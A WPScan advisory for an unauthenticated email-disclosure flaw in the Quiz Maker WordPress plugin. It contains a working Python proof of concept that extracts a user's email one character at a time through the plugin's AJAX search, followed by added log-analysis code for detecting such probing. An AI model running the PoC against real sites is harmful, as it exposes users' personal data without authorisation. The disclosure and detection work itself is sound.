wpvulndb | Krzysztof Zając (CERT PL) | WPVDB-ID:C62BE802-E91A-4BCF-990D-8FD8EF7C9A28
History: Nov 30, 2023 - 12:00 a.m.

Quiz Maker < 6.4.9.5 - Unauthenticated Email Address Disclosure

wpscan.com

AI Score: 6.5 Medium (Confidence: High)
EPSS: 0.001 Low (Percentile: 31.1%)

Description

The plugin does not adequately authorize the ays_quiz_author_user_search AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses.

PoC

    import string
    import requests

    base_url = 'http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ays_quiz_author_user_search&search='
    id_to_find = 1
    letter_candidates = string.ascii_lowercase + string.digits + '-_.'
    email = '@'

    # Find letters after @
    while True:
        print("current email", email)
        for letter in letter_candidates:
            query = email + letter
            data = requests.get(base_url + query).json()
            if id_to_find in [item['id'] for item in data['results']]:
                email = query
                break
        else:
            break

    # Find letters before @
    while True:
        print("current email", email)
        for letter in letter_candidates:
            query = letter + email
            data = requests.get(base_url + query).json()
            if id_to_find in [item['id'] for item in data['results']]:
                email = query
                break
        else:
            break
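A log check for the request pattern the PoC above produces, added here as an example and not part of the original advisory. It assumes combined-format web server access logs and a hypothetical threshold `min_fanout`; the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

ACTION = "ays_quiz_author_user_search"  # AJAX action named in the advisory
# Client IP and request target from a combined-format access log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3}')

def search_terms_by_client(lines):
    """Map client IP -> ordered 'search' values sent to the action.
    Only query-string parameters are visible; POST bodies are not logged."""
    terms = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        if ACTION in qs.get("action", []):
            terms[ip].append(qs.get("search", [""])[0])
    return dict(terms)

def probing_clients(lines, min_fanout=5):
    """Flag clients that sent >= min_fanout distinct one-character extensions
    of the same search value. Returns {ip: (shared_value, variant_count)}.
    Typing into an autocomplete box extends a value one way; testing a
    character set produces many siblings of one parent."""
    flagged = {}
    for ip, values in search_terms_by_client(lines).items():
        children = defaultdict(set)
        for v in values:
            if len(v) >= 2:
                children[v[:-1]].add(v)   # character appended
                children[v[1:]].add(v)    # character prepended
        if children:
            parent, kids = max(children.items(), key=lambda kv: len(kv[1]))
            if len(kids) >= min_fanout:
                flagged[ip] = (parent, len(kids))
    return flagged

def _line(ip, search):
    return (f'{ip} - - [30/Nov/2023:10:00:00 +0000] "GET /wp-admin/admin-ajax.php'
            f'?action={ACTION}&search={search} HTTP/1.1" 200 64')

# Constructed sample: documentation-range IPs, not real traffic.
SAMPLE = ([_line("198.51.100.7", "@" + c) for c in "abcdefg"]
          + [_line("198.51.100.7", "@g" + c) for c in "abc"]
          + [_line("192.0.2.10", s) for s in ("j", "jo", "joh", "john")])

if __name__ == "__main__":
    print(probing_clients(SAMPLE))
```

Access logs do not show whether a request carried a login session, so any hit on this action from a client that is not a known administrator is worth reviewing even below the threshold.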

CPE    Name    Operator    Version
-      -       eq          6.4.9.5
